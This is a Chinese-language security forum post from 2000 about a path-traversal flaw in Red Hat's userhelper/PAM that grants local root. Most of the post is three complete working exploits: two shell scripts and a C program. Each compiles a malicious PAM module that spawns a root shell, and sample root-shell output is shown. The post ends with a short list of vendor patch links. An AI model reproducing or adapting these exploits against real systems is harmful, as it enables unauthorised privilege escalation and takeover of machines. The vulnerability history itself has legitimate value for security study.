发信人: ilyyz()
整理人: (2000-04-24 23:55:41), 站内信件
|
下面的问题是基于 L0pht 的安全发现。"usermode-1.15"软件包中有 "pam"和 " userhelper"两个程序都有安全问题。
"pam"允许人们从该主机下载任何文件,而 "userhelper" 允许人们非法获取 ro ot。
这是有关的 exploit:
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by [email protected]
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userh elper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confinin g
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
Derek Callaway posted another userhelper/PAM exploit:
#!/bin/sh
# userrooter.sh by S <[email protected]>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'. ' '{print $2}'`
if [ $LAME -gt 15 ]
then echo "Machine doesn't appear to be vulnerable :-\\"
echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login
------------------------------------------**************************** *****--------------------------------
/*
* pam-mdk.c (C) 2000 Paulo Ribeiro
*
* DESCRIPTION:
* -----------
* Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
* exploit (pamslam.sh) doesn't work on it (at least on my machine). So ,
* I created this C program based on it which exploits PAM/userhelper
* and gives you UID 0.
*
* SYSTEMS TESTED:
* --------------
* Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
*
* RESULTS:
* -------
* [prrar@linux prrar]$ id
* uid=501(prrar) gid=501(prrar) groups=501(prrar)
* [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
* [prrar@linux prrar]$ ./pam-mdk
* sh-2.03# id
* uid=0(root) gid=501(prrar) groups=501(prrar)
* sh-2.03#
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
FILE *fp;
strcpy(argv[0], "vi test.txt");
fp = fopen("abc.c", "a");
fprintf(fp, "#include<stdlib.h>\n");
fprintf(fp, "#include<unistd.h>\n");
fprintf(fp, "#include<sys/types.h>\n");
fprintf(fp, "void _init(void) {\n");
fprintf(fp, "\tsetuid(geteuid());\n");
fprintf(fp, "\tsystem(\"/bin/sh\");\n");
fprintf(fp, "}");
fclose(fp);
system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
system("chmod 755 abc.conf");
system("gcc -fPIC -o abc.o -c abc.c");
system("ld -shared -o abc.so abc.o");
system("chmod 755 abc.so");
system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
system("rm -rf abc.*");
}
/* pam-mdk.c: EOF */
Mandrake 6.0 看起来也受影响:
[darron@maul darron]$ gcc pam-mdk.c -o pam-mdk
[darron@maul darron]$ ./pam-mdk
sh-2.03# id
uid=0(root) gid=502(admin) groups=502(admin)
sh-2.03#
[darron@maul /etc]$ cat mandrake-release
Linux Mandrake release 6.0 (Venus)
解决方案
For RedHat
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
For Turbo Linux:
rpm -Fvh ftp://ftp.turbolinux.com/pub/updates/6.0/security/pam-0.72-3. i386.rpm
rpm -Fvh ftp://ftp.turbolinux.com/pub/updates/6.0/security/usermode-1. 18-1.i386.rpm
The source rpms can be downloaded here:
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/pam-0.72-3.src.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/usermode-1.18-1.src.rpm
相关站点
http://www.l0pht.com
-- 欢迎使用中国网络安全评估中心 网络安全在线扫描系统
www.cnns.net
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.191.50]
|
|